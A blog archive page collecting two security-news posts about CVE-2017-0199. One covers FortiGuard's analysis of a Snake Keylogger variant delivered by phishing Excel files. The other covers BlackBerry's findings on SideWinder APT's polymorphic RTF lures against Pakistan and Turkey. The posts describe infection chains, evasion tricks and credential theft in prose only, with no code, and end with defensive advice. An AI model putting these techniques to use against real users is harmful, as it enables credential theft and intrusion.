Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label CVE-2017-0199. Show all posts
Snake Keylogger
CVE-2017-0199 Data Breach Email Phishing Attack Sensitive Information Snake Keylogger

New Version of Snake Keylogger Targets Victims Through Phishing Emails


Researchers at Fortinet's FortiGuard Labs have uncovered a newly evolved variant of the Snake Keylogger, a type of malicious software notorious for capturing and recording everything a user types. Keyloggers are often used by cybercriminals to steal personal information, such as passwords, credit card numbers, and other sensitive data. This new variant of Snake Keylogger, also known as “404 Keylogger” or “KrakenKeylogger,” is being distributed through phishing campaigns and has been upgraded to exploit specific vulnerabilities, making it even more dangerous.

The attack is initiated by a deceptive phishing email that pretends to be a notification about a financial transaction. FortiGuard Labs’ security systems identified the email, which was flagged with the subject line “[virus detected],” and it contains an attached Excel file named “swift copy.xls.” Although the file may appear harmless, opening it sets off a chain reaction that ultimately leads to the installation of the Snake Keylogger on the recipient's computer.

The Excel file attached to the phishing email is no ordinary spreadsheet—it has been specially crafted to take advantage of a known security vulnerability, CVE-2017-0199. This vulnerability allows attackers to execute code remotely by embedding a malicious link within the file. When the victim opens the document, this hidden link discreetly connects to a remote server, which then delivers a secondary malicious file in the form of an HTA (HTML Application) file. This file, containing obfuscated JavaScript, is executed automatically by the Windows operating system, setting the stage for further malicious actions.

The HTA file is programmed to run a VBScript that initiates the download and execution of a final payload—a malicious executable named “sahost.exe”—from a remote server. This payload, known as the Loader module, is designed with multiple layers of encryption and obfuscation, making it difficult for antivirus software to detect or analyse. Once executed, the Loader module unpacks additional encrypted components, including the main module of the Snake Keylogger, which is hidden within an encrypted Bitmap resource.

The Loader module not only delivers the Snake Keylogger but also ensures that it remains undetected and continues operating on the infected system. It accomplishes this by decrypting and loading several key components into the computer's memory, where they can execute without being noticed. Among these components is a critical module called “Tyrone.dll,” which plays a crucial role in the keylogger’s ability to persist on the victim's system. This persistence is maintained through a scheduled task that launches the keylogger whenever the computer is started.

Once installed, the Snake Keylogger operates stealthily, capturing everything the user types and taking screenshots of their activities. It targets a wide range of applications, including web browsers, email clients, and messaging software, and is capable of extracting saved credentials and other sensitive information from these programs. To avoid detection, the keylogger uses a technique called process hollowing, which involves injecting malicious code into a legitimate process, allowing it to operate without raising alarms.

One of the most concerning features of this keylogger is its ability to send the stolen data directly to the attacker via email. The keylogger uses SMTP to transmit the victim’s credentials and other sensitive information in real-time, enabling the attacker to quickly exploit the data or commit financial theft. Additionally, FortiGuard Labs discovered that this variant of Snake Keylogger employs sophisticated anti-analysis techniques. For example, it can detect if it is being run in a security research environment, in which case it refrains from sending the stolen data, making it harder for researchers to analyse the malware.

To protect against these types of threats, FortiGuard Labs advises caution when it comes to emails from unknown sources, especially those with attachments. It's imperative to keep all software up-to-date and utilise robust security solutions to prevent such attacks. By staying informed and vigilant, individuals and organizations can better protect themselves from this and other emerging cyber threats.




Read more »
SideWinder APT Group
APT Group BlackBerry Threat Research and Intelligence CVE-2017-0199 Cyber Attacks Multiphase Polymorphic Attack SideWinder SideWinder APT Group

SideWinder APT Group: Victims in Pakistan and Turkey Stricken with Multiphase Polymorphic Attack


Government authorities and individuals in Turkey are apparently been targeted by India’s well-known SideWinder APT group, which is using polymorphism techniques, enabling bypass standard signature-based antivirus (AV) detection and deliver a next-stage payload.

In an article published on their blog on May 8, the researchers from the BlackBerry Threat Research and Intelligence team described how attacks make use of documents with information catered to their interests that, when opened, leverages a remote template injection issue to deliver malicious payloads.

The campaign's first phase, identified last November, targets Pakistani targets with a server-side polymorphic attacks, while a later phase, discovered earlier this year, employs phishing techniques to spread malicious lure documents to victims. 

While, rather than using malicious macron with documents to disseminate malware, which is frequently the case when documents are used as lures, the APT uses the CVE-2017-0199 vulnerability to deliver the payloads.

How Polymorphism Deceits Defenders 

Attackers have been utilizing the Server-side polymorphism as a way to evade detection by AV tools. The researchers noted that it accomplishes this by utilizing malicious code that modifies its appearance through encryption and obfuscation, ensuring that no two samples seem the same and are therefore difficult to analyze.

“The attack can fool defenders because it serves the victim with a new sample each time a link is clicked,” says Dmitry Bestuzhev, senior director of cyber-threat intelligence at BlackBerry. “In this case, each new download has a new hash, which “effectively breaks hash-based detections used by security operations centers (SOCs) and some endpoint scanners,” he says.

“Since there’s a new hash each time, there is no information on a given sample on public multi scanners like VirusTotal unless each new sample is uploaded over and over for further analysis[…]So it makes life harder for the victims because of the lack of information on public sandboxes and other-like security services,” Bestuzhev continues. 

The Latest Threat Campaigns 

Blackberry researchers evaluated the campaign's numerous documents, which were located on an attacker-controlled server and distributed to victims. Researchers first came across one with the subject line "GUIDELINES FOR BEACON JOURNAL - 2023 PAKISTAN NAVY WAR COLLEGE (PNWC)," and in early December identified another that claimed to be a letter of offer and acceptance "for the purchase of defense articles, defense services, or both."

In both of these cases, “The name of the file ‘file.rtf’ and the file type are the same; however, the contents, file size and the file hash are different[…]This is an example of server-based polymorphism, where each time the server responds with a different version of file, so bypassing the victim’s antivirus scanner (presuming the antivirus uses signature-based detection),” they added.

In case the user does not fall under the Pakistani IP range, 8 byte RTF file that contains a single string. In contrary, if the user is within the Pakistani IP range, the server then returns the RTF payload, varying between 406KB to 414KB in size.

Attacks Expanding to Turkey and Beyond 

Early in March, the researchers found a new malicious document connected to the prior attack that had been transmitted via phishing emails. This discovery suggested that Turkey had become a new target country for SideWinder. The servers were put up so that a victim in Turkey could get a second-stage payload, according to the researchers, who discovered them in mid-March.

While Southeast Asian regions like Pakistan and Sri Lanka have always been prime targets of SideWinder, them targeting victims in Turkey makes sense, considering their geopolitical conditions where the Turkish Government has been backing Pakistan, sparking criticism from India, according to the researchers.

While polymorphic attacks overall can be difficult to defend against, detection and prevention strategies based on behavior and hashes can be effectively used against them, Bestuzhev notes.

“The key for organizations to mitigate these attacks”, Bestuzhev adds, “is not to focus on volatile indicators of compromise but on meaningful tactics, techniques, and procedures (TTPs) and behaviors in the system or code blocks covered by machine learning technologies.”

Read more »
Subscribe to: Posts (Atom)